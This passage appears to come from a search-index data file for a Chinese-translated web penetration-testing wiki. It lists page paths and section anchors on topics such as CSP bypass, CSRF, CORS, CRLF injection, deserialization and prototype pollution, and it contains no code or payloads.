ex.html#定义资源","pentesting-web/content-security-policy-csp-bypass/index.html#指令","pentesting-web/content-security-policy-csp-bypass/index.html#sources","pentesting-web/content-security-policy-csp-bypass/index.html#不安全的-csp-规则","pentesting-web/content-security-policy-csp-bypass/index.html#unsafe-inline","pentesting-web/content-security-policy-csp-bypass/index.html#unsafe-eval","pentesting-web/content-security-policy-csp-bypass/index.html#strict-dynamic","pentesting-web/content-security-policy-csp-bypass/index.html#通配符-","pentesting-web/content-security-policy-csp-bypass/index.html#缺少-object-src-和-default-src","pentesting-web/content-security-policy-csp-bypass/index.html#文件上传--self","pentesting-web/content-security-policy-csp-bypass/index.html#form-action","pentesting-web/content-security-policy-csp-bypass/index.html#third-party-endpoints--unsafe-eval","pentesting-web/content-security-policy-csp-bypass/index.html#第三方端点--jsonp","pentesting-web/content-security-policy-csp-bypass/index.html#第三方滥用","pentesting-web/content-security-policy-csp-bypass/index.html#通过-rpo-relative-path-overwrite","pentesting-web/content-security-policy-csp-bypass/index.html#iframes-js-执行","pentesting-web/content-security-policy-csp-bypass/index.html#缺少--base-uri","pentesting-web/content-security-policy-csp-bypass/index.html#angularjs-事件","pentesting-web/content-security-policy-csp-bypass/index.html#angularjs-和-whitelisted-domain","pentesting-web/content-security-policy-csp-bypass/index.html#通过重定向绕过","pentesting-web/content-security-policy-csp-bypass/index.html#bypass-csp-with-dangling-markup","pentesting-web/content-security-policy-csp-bypass/index.html#unsafe-inline-img-src--via-xss","pentesting-web/content-security-policy-csp-bypass/index.html#with-service-workers","pentesting-web/content-security-policy-csp-bypass/index.html#策略注入","pentesting-web/content-security-policy-csp-bypass/index.html#img-src--via-xss-iframe---时间攻击","pentesting-web/content-security-policy-csp-bypass/index.html#通过-bookmarklets","pentesting-web/content-security-policy-csp-bypass/index.html#通过限制-csp-绕过-csp","pentesting-web/content-security-policy-csp-bypass/index.html#使用-content-security-policy-report-only-的-js-exfiltration","pentesting-web/content-security-policy-csp-bypass/index.html#cve-2020-6519","pentesting-web/content-security-policy-csp-bypass/index.html#leaking-信息与-csp-和-iframe","pentesting-web/content-security-policy-csp-bypass/index.html#unsafe-technologies-to-bypass-csp","pentesting-web/content-security-policy-csp-bypass/index.html#php-errors-when-too-many-params","pentesting-web/content-security-policy-csp-bypass/index.html#php-response-buffer-overload","pentesting-web/content-security-policy-csp-bypass/index.html#kill-csp-via-max_input_vars-headers-already-sent","pentesting-web/content-security-policy-csp-bypass/index.html#重写错误页面","pentesting-web/content-security-policy-csp-bypass/index.html#some--self--wordpress","pentesting-web/content-security-policy-csp-bypass/index.html#csp-exfiltration-bypasses","pentesting-web/content-security-policy-csp-bypass/index.html#location","pentesting-web/content-security-policy-csp-bypass/index.html#meta-tag","pentesting-web/content-security-policy-csp-bypass/index.html#dns-prefetch","pentesting-web/content-security-policy-csp-bypass/index.html#webrtc","pentesting-web/content-security-policy-csp-bypass/index.html#credentialscontainer","pentesting-web/content-security-policy-csp-bypass/index.html#在线检查-csp-策略","pentesting-web/content-security-policy-csp-bypass/index.html#自动生成-csp","pentesting-web/content-security-policy-csp-bypass/index.html#参考资料","pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.html#通过文本和图像","pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.html#通过错误","pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.html#参考","pentesting-web/hacking-with-cookies/index.html#cookies-hacking","pentesting-web/hacking-with-cookies/index.html#cookie-attributes","pentesting-web/hacking-with-cookies/index.html#expires-and-max-age","pentesting-web/hacking-with-cookies/index.html#domain","pentesting-web/hacking-with-cookies/index.html#path","pentesting-web/hacking-with-cookies/index.html#ordering-rules","pentesting-web/hacking-with-cookies/index.html#samesite","pentesting-web/hacking-with-cookies/index.html#cookies-flags","pentesting-web/hacking-with-cookies/index.html#httponly","pentesting-web/hacking-with-cookies/index.html#secure","pentesting-web/hacking-with-cookies/index.html#cookies-prefixes","pentesting-web/hacking-with-cookies/index.html#overwriting-cookies","pentesting-web/hacking-with-cookies/index.html#cookies-attacks","pentesting-web/hacking-with-cookies/index.html#decoding-and-manipulating-cookies","pentesting-web/hacking-with-cookies/index.html#session-hijacking","pentesting-web/hacking-with-cookies/index.html#session-fixation","pentesting-web/hacking-with-cookies/index.html#session-donation","pentesting-web/hacking-with-cookies/index.html#jwt-cookies","pentesting-web/hacking-with-cookies/index.html#cross-site-request-forgery-csrf","pentesting-web/hacking-with-cookies/index.html#empty-cookies","pentesting-web/hacking-with-cookies/index.html#cookies-version","pentesting-web/hacking-with-cookies/index.html#waf-bypasses","pentesting-web/hacking-with-cookies/index.html#额外易受攻击的-cookies-检查","pentesting-web/hacking-with-cookies/index.html#参考资料","pentesting-web/hacking-with-cookies/cookie-tossing.html#cookie-tossing","pentesting-web/hacking-with-cookies/cookie-tossing.html#描述","pentesting-web/hacking-with-cookies/cookie-tossing.html#cookie顺序","pentesting-web/hacking-with-cookies/cookie-tossing.html#保护绕过","pentesting-web/hacking-with-cookies/cookie-tossing.html#cookie炸弹","pentesting-web/hacking-with-cookies/cookie-tossing.html#防御","pentesting-web/hacking-with-cookies/cookie-tossing.html#参考","pentesting-web/hacking-with-cookies/cookie-jar-overflow.html","pentesting-web/hacking-with-cookies/cookie-bomb.html","pentesting-web/cors-bypass.html#cors---misconfigurations--bypass","pentesting-web/cors-bypass.html#什么是-cors","pentesting-web/cors-bypass.html#access-control-allow-origin-头","pentesting-web/cors-bypass.html#access-control-allow-credentials-头","pentesting-web/cors-bypass.html#csrf-预检请求","pentesting-web/cors-bypass.html#理解跨域通信中的预检请求","pentesting-web/cors-bypass.html#本地网络请求预检请求","pentesting-web/cors-bypass.html#通配符","pentesting-web/cors-bypass.html#可利用的错误配置","pentesting-web/cors-bypass.html#例外利用网络位置作为身份验证","pentesting-web/cors-bypass.html#origin-在-access-control-allow-origin-中的反射","pentesting-web/cors-bypass.html#利用-null-origin","pentesting-web/cors-bypass.html#正则表达式绕过技术","pentesting-web/cors-bypass.html#高级正则表达式绕过","pentesting-web/cors-bypass.html#从子域名中的-xss","pentesting-web/cors-bypass.html#特殊字符","pentesting-web/cors-bypass.html#其他有趣的-url-技巧","pentesting-web/cors-bypass.html#服务器端缓存中毒","pentesting-web/cors-bypass.html#客户端缓存中毒","pentesting-web/cors-bypass.html#绕过","pentesting-web/cors-bypass.html#xssi-跨站脚本包含--jsonp","pentesting-web/cors-bypass.html#简单无用绕过","pentesting-web/cors-bypass.html#iframe--弹出窗口绕过","pentesting-web/cors-bypass.html#通过ttl进行dns重绑定","pentesting-web/cors-bypass.html#通过-dns缓存泛洪-进行dns重绑定","pentesting-web/cors-bypass.html#通过-缓存-进行dns重绑定","pentesting-web/cors-bypass.html#其他常见绕过","pentesting-web/cors-bypass.html#dns重绑定武器化","pentesting-web/cors-bypass.html#针对dns重绑定的真正保护","pentesting-web/cors-bypass.html#工具","pentesting-web/cors-bypass.html#参考文献","pentesting-web/crlf-0d-0a.html#crlf-0d0a-注入","pentesting-web/crlf-0d-0a.html#crlf","pentesting-web/crlf-0d-0a.html#crlf-注入漏洞","pentesting-web/crlf-0d-0a.html#示例日志文件中的-crlf-注入","pentesting-web/crlf-0d-0a.html#http-响应拆分","pentesting-web/crlf-0d-0a.html#http-header-injection","pentesting-web/crlf-0d-0a.html#header-injection-to-request-smuggling","pentesting-web/crlf-0d-0a.html#memcache-注入","pentesting-web/crlf-0d-0a.html#如何防止-web-应用中的-crlf--http-头注入","pentesting-web/crlf-0d-0a.html#cheatsheet","pentesting-web/crlf-0d-0a.html#最近的漏洞-2023--2025","pentesting-web/crlf-0d-0a.html#高级-unicode--控制字符绕过","pentesting-web/crlf-0d-0a.html#通过重复-content-encoding-技巧进行-waf-规避-2023","pentesting-web/crlf-0d-0a.html#自动工具","pentesting-web/crlf-0d-0a.html#暴力破解检测列表","pentesting-web/crlf-0d-0a.html#参考文献","pentesting-web/csrf-cross-site-request-forgery.html#csrf-cross-site-request-forgery","pentesting-web/csrf-cross-site-request-forgery.html#cross-site-request-forgery-csrf-解释","pentesting-web/csrf-cross-site-request-forgery.html#csrf-攻击的先决条件","pentesting-web/csrf-cross-site-request-forgery.html#快速检查","pentesting-web/csrf-cross-site-request-forgery.html#防御-csrf-攻击","pentesting-web/csrf-cross-site-request-forgery.html#绕过防御","pentesting-web/csrf-cross-site-request-forgery.html#从-post-到-get基于方法的-csrf-验证绕过","pentesting-web/csrf-cross-site-request-forgery.html#缺少-token","pentesting-web/csrf-cross-site-request-forgery.html#csrf-令牌未绑定到用户会话","pentesting-web/csrf-cross-site-request-forgery.html#绕过方法","pentesting-web/csrf-cross-site-request-forgery.html#custom-header-token-bypass","pentesting-web/csrf-cross-site-request-forgery.html#csrf-token-is-verified-by-a-cookie","pentesting-web/csrf-cross-site-request-forgery.html#content-type-更改","pentesting-web/csrf-cross-site-request-forgery.html#绕过-json-数据的预检请求","pentesting-web/csrf-cross-site-request-forgery.html#referrer--origin-检查绕过","pentesting-web/csrf-cross-site-request-forgery.html#head-method-bypass","pentesting-web/csrf-cross-site-request-forgery.html#exploit-examples","pentesting-web/csrf-cross-site-request-forgery.html#stored-csrf-via-user-generated-html","pentesting-web/csrf-cross-site-request-forgery.html#login-csrf-与-stored-xss-链接","pentesting-web/csrf-cross-site-request-forgery.html#exfiltrating-csrf-token","pentesting-web/csrf-cross-site-request-forgery.html#get-using-html-tags","pentesting-web/csrf-cross-site-request-forgery.html#表单-get-请求","pentesting-web/csrf-cross-site-request-forgery.html#表单-post-请求","pentesting-web/csrf-cross-site-request-forgery.html#通过-iframe-发起表单-post-请求","pentesting-web/csrf-cross-site-request-forgery.html#ajax-post-request","pentesting-web/csrf-cross-site-request-forgery.html#multipartform-data-post-请求","pentesting-web/csrf-cross-site-request-forgery.html#multipartform-data-post-request-v2","pentesting-web/csrf-cross-site-request-forgery.html#在-iframe-内发起表单-post-请求","pentesting-web/csrf-cross-site-request-forgery.html#窃取-csrf-token-并发送-post-请求","pentesting-web/csrf-cross-site-request-forgery.html#窃取-csrf-token-并使用-iframeform-和-ajax-发送-post-请求","pentesting-web/csrf-cross-site-request-forgery.html#窃取-csrf-token-并-使用-iframe-和-form-发送-post-请求","pentesting-web/csrf-cross-site-request-forgery.html#窃取-token-并使用-2-个-iframes-发送它","pentesting-web/csrf-cross-site-request-forgery.html#poststeal-csrf-token-使用-ajax-并通过-form-发送-post","pentesting-web/csrf-cross-site-request-forgery.html#csrf-与-socketio","pentesting-web/csrf-cross-site-request-forgery.html#csrf-login-brute-force","pentesting-web/csrf-cross-site-request-forgery.html#工具","pentesting-web/csrf-cross-site-request-forgery.html#参考资料","pentesting-web/dangling-markup-html-scriptless-injection/index.html#dangling-markup---html-scriptless-injection","pentesting-web/dangling-markup-html-scriptless-injection/index.html#resume","pentesting-web/dangling-markup-html-scriptless-injection/index.html#main-applications","pentesting-web/dangling-markup-html-scriptless-injection/index.html#stealing-clear-text-secrets","pentesting-web/dangling-markup-html-scriptless-injection/index.html#偷取表单","pentesting-web/dangling-markup-html-scriptless-injection/index.html#stealing-forms-2","pentesting-web/dangling-markup-html-scriptless-injection/index.html#stealing-forms-3","pentesting-web/dangling-markup-html-scriptless-injection/index.html#窃取明文秘密-2","pentesting-web/dangling-markup-html-scriptless-injection/index.html#表单参数注入","pentesting-web/dangling-markup-html-scriptless-injection/index.html#通过-noscript-偷取明文秘密","pentesting-web/dangling-markup-html-scriptless-injection/index.html#通过用户交互绕过csp","pentesting-web/dangling-markup-html-scriptless-injection/index.html#误导性脚本工作流程-1---html-命名空间攻击","pentesting-web/dangling-markup-html-scriptless-injection/index.html#误导性脚本工作流程-2---脚本命名空间攻击","pentesting-web/dangling-markup-html-scriptless-injection/index.html#abuse-of-jsonp","pentesting-web/dangling-markup-html-scriptless-injection/index.html#iframe-滥用","pentesting-web/dangling-markup-html-scriptless-injection/index.html#meta-滥用","pentesting-web/dangling-markup-html-scriptless-injection/index.html#新的-portal-html-标签","pentesting-web/dangling-markup-html-scriptless-injection/index.html#html-泄漏","pentesting-web/dangling-markup-html-scriptless-injection/index.html#ss-leaks","pentesting-web/dangling-markup-html-scriptless-injection/index.html#xs-searchxs-leaks","pentesting-web/dangling-markup-html-scriptless-injection/index.html#暴力破解检测列表","pentesting-web/dangling-markup-html-scriptless-injection/index.html#参考文献","pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.html#ss-leaks","pentesting-web/dapps-DecentralizedApplications.html#dapps---去中心化应用","pentesting-web/dapps-DecentralizedApplications.html#什么是-dapp","pentesting-web/dapps-DecentralizedApplications.html#web3-dapp-架构","pentesting-web/dapps-DecentralizedApplications.html#无-api-dapps","pentesting-web/dapps-DecentralizedApplications.html#启用-api-dapps","pentesting-web/dapps-DecentralizedApplications.html#全规模-dapps","pentesting-web/dapps-DecentralizedApplications.html#web2-漏洞","pentesting-web/dapps-DecentralizedApplications.html#web3-攻击面","pentesting-web/dapps-DecentralizedApplications.html#浪费资金强迫后端执行交易","pentesting-web/dapps-DecentralizedApplications.html#dos糟糕的交易处理时间","pentesting-web/dapps-DecentralizedApplications.html#后端区块链不同步---竞争条件","pentesting-web/dapps-DecentralizedApplications.html#智能合约地址验证","pentesting-web/dapps-DecentralizedApplications.html#资产类别处理不当","pentesting-web/dapps-DecentralizedApplications.html#参考文献","pentesting-web/dependency-confusion.html#依赖混淆","pentesting-web/dependency-confusion.html#基本信息","pentesting-web/dependency-confusion.html#利用","pentesting-web/dependency-confusion.html#拼写错误和不存在","pentesting-web/dependency-confusion.html#未指定版本--跨索引的最佳版本选择","pentesting-web/dependency-confusion.html#aws-修复","pentesting-web/dependency-confusion.html#查找易受攻击的库","pentesting-web/dependency-confusion.html#实用攻击者手册针对授权测试中的红队","pentesting-web/dependency-confusion.html#防御者手册实际防止混淆的方法","pentesting-web/dependency-confusion.html#生态系统注意事项和安全配置片段","pentesting-web/dependency-confusion.html#javascripttypescript-npm-yarn-pnpm","pentesting-web/dependency-confusion.html#python-pip--poetry","pentesting-web/dependency-confusion.html#net-nuget","pentesting-web/dependency-confusion.html#java-mavengradle","pentesting-web/dependency-confusion.html#go-modules","pentesting-web/dependency-confusion.html#rust-cargo","pentesting-web/dependency-confusion.html#ruby-bundler","pentesting-web/dependency-confusion.html#cicd-和注册表控制措施","pentesting-web/dependency-confusion.html#参考文献","pentesting-web/deserialization/index.html#deserialization","pentesting-web/deserialization/index.html#basic-information","pentesting-web/deserialization/index.html#php","pentesting-web/deserialization/index.html#php-反序列化--自动加载类","pentesting-web/deserialization/index.html#序列化引用值","pentesting-web/deserialization/index.html#防止-php-对象注入使用-allowed_classes","pentesting-web/deserialization/index.html#phpggc-ysoserial-for-php","pentesting-web/deserialization/index.html#phar-元数据反序列化","pentesting-web/deserialization/index.html#python","pentesting-web/deserialization/index.html#pickle","pentesting-web/deserialization/index.html#yaml----jsonpickle","pentesting-web/deserialization/index.html#类污染-python-原型污染","pentesting-web/deserialization/index.html#nodejs","pentesting-web/deserialization/index.html#js-魔法函数","pentesting-web/deserialization/index.html#__proto__-和-prototype-污染","pentesting-web/deserialization/index.html#node-serialize","pentesting-web/deserialization/index.html#funcster","pentesting-web/deserialization/index.html#serialize-javascript","pentesting-web/deserialization/index.html#cryo-库","pentesting-web/deserialization/index.html#java---http","pentesting-web/deserialization/index.html#指纹","pentesting-web/deserialization/index.html#检查是否存在漏洞","pentesting-web/deserialization/index.html#利用","pentesting-web/deserialization/index.html#labs","pentesting-web/deserialization/index.html#why","pentesting-web/deserialization/index.html#prevention","pentesting-web/deserialization/index.html#参考文献","pentesting-web/deserialization/index.html#jndi注入与log4shell","pentesting-web/deserialization/index.html#jms---java消息服务","pentesting-web/deserialization/index.html#产品","pentesting-web/deserialization/index.html#利用-1","pentesting-web/deserialization/index.html#参考文献-1","pentesting-web/deserialization/index.html#net","pentesting-web/deserialization/index.html#指纹-1","pentesting-web/deserialization/index.html#ysoserialnet","pentesting-web/deserialization/index.html#viewstate","pentesting-web/deserialization/index.html#预防","pentesting-web/deserialization/index.html#参考文献-2","pentesting-web/deserialization/index.html#ruby","pentesting-web/deserialization/index.html#ruby-send-方法","pentesting-web/deserialization/index.html#ruby-类污染","pentesting-web/deserialization/index.html#ruby-_json-污染","pentesting-web/deserialization/index.html#其他库","pentesting-web/deserialization/index.html#bootstrap-caching","pentesting-web/deserialization/index.html#ruby-marshal-exploitation-in-practice-updated","pentesting-web/deserialization/index.html#参考文献-3","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#nodejs---__proto__--prototype-pollution","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#javascript中的对象","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#javascript中的函数和类","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#prototypes-in-javascript","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#inheritance","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#__proto__-pollution","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#exploring-prototype-pollution-in-javascript","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#prototype-pollution","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#污染其他对象","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#从类到-objectprototype","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#数组元素污染","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#html-elements-pollution","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#示例","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#基本示例","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#override-function","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#原型污染到-rce","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#客户端原型污染到-xss","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#cve-201911358通过-jquery--extend-的原型污染攻击","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#cve-20183721-cve-201910744-通过-lodash-的原型污染攻击","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#另一个包含-cve-的教程","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#检测原型污染的工具","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#nodejs-中的-ast-原型污染","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#预防措施","pentesting-web/deserialization/nodejs-proto-prototype-pollution/index.html#参考文献","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#客户端原型污染","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#使用自动工具发现","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#调试属性的使用位置","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#找到原型污染的根本原因","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#查找脚本小工具","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#示例-在-mithil-库代码中找到-pp-小工具","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#针对易受攻击库的有效负载重新编译","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#通过-pp-绕过-html-清理器","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#新工具与自动化-20232025","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#最近的原型污染-gadget-研究-20222025","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#突出的客户端-pp-cve2023-2025","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#现代防御措施","pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.html#参考文献","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#express-原型污染工具","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#提供-xss-响应","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#将-json-内容类型更改为-html","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#渲染-utf7","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#安全扫描技术","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#json-空格","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#暴露的头部","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#options-方法","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#状态","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#错误","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#反射值","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#misc","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#允许点","pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.html#参考","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#prototype-pollution-to-rce","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#vulnerable-code","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#pp2rce-通过环境变量","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#毒化-__proto__","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#污染-constructorprototype","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#pp2rce-via-env-vars--cmdline","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#filesystem-less-pp2rce-via---import-node--19","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#为什么---import-有帮助","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#dns-交互","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#pp2rce-漏洞-child_process-函数","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#强制生成","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#控制-require-文件路径","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#通过原型污染设置-require-文件路径","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#vm-gadgets","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#fixes--unexpected-protections","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#other-gadgets","pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.html#references","pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.html","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#java-dns-反序列化gadgetprobe-和-java-反序列化扫描器","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#反序列化中的-dns-请求","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#urldns-负载代码示例","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#更多信息","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#gadgetprobe","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#它是如何工作的","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#更多信息-1","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#java-反序列化扫描仪","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#被动","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#主动","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#java-反序列化-dns-外泄信息","pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.html#更多信息-2","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#basic-java-deserialization-with-objectinputstream-readobject","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#serializable","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#提醒在反序列化过程中哪些方法会被隐式调用","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#结论经典场景","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#2023-2025java-反序列化攻击的新动态","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#现代缓解措施","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#更新的工具备忘单2024","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#安全-readobject-实现的快速检查清单","pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.html#参考文献","pentesting-web/deserialization/php-deserialization-+-autoload-classes.html#php---反序列化--自动加载类","pentesting-web/deserialization/php-deserialization-+-autoload-classes.html#php-反序列化--spl_autoload_register--lfigadget","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#commonscollection1-payload---java-transformers-to-rutime-exec-and-thread-sleep","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#java-transformers-to-rutime-exec","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#如何","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#摘要","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#java-线程休眠","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html#更多小工具","pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.html","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#基础-net-反序列化-objectdataprovider-gadget-expandedwrapper-and-jsonnet","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#objectdataprovider-gadget","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#这是如何实现的","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#expandedwrapper","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#jsonnet","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#jsonnet-示例","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#滥用-jsonnet","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#高级-net-gadget-chains-ysonet--ysoserialnet","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#构建--安装-ysonet","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#检测与加固","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#真实世界-sink-sitecore-converttoruntimehtml--binaryformatter","pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.html#参考资料","pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.html","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#利用-__viewstate-而不知其秘密","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#什么是-viewstate","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#测试用例","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#测试用例1--enableviewstatemacfalse-和-viewstateencryptionmodefalse","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#test-case-15--like-test-case-1-but-the-viewstate-cookie-isnt-sent-by-the-server","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#test-case-2--net--45-and-enableviewstatemactrue--viewstateencryptionmodefalse","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#test-case-3--net--45-和-enableviewstatemactruefalse-和-viewstateencryptionmodetrue","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#test-case-4--net--45-和-enableviewstatemactruefalse-和-viewstateencryptionmodetruefalse除非两个属性都为-false","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#测试用例-6--使用-viewstateuserkeys","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#成功利用的结果","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#通过反射转储-aspnet-机器密钥-sharpyshellsharepoint-toolshell","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#2024-2025年实际利用场景和硬编码机器密钥","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#微软公开披露的机器密钥浪潮2024年12月--2025年2月","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#cve-2025-30406--gladinet-centrestack--triofox-硬编码密钥","pentesting-web/deserialization/exploiting-__viewstate-parameter.html#参考文献","pentesting-web/deserialization/python-yaml-deserialization.html#python-yaml-反序列化","pentesting-web/deserialization/python-yaml-deserialization.html#yaml--反序列化","pentesting-web/deserialization/python-yaml-deserialization.html#基本利用","pentesting-web/deserialization/python-yaml-deserialization.html#漏洞-load-没有-loader","pentesting-web/deserialization/python-yaml-deserialization.html#rce","pentesting-web/deserialization/python-yaml-deserialization.html#创建有效负载的工具","pentesting-web/deserialization/python-yaml-deserialization.html#参考文献","pentesting-web/deserialization/jndi-java-naming-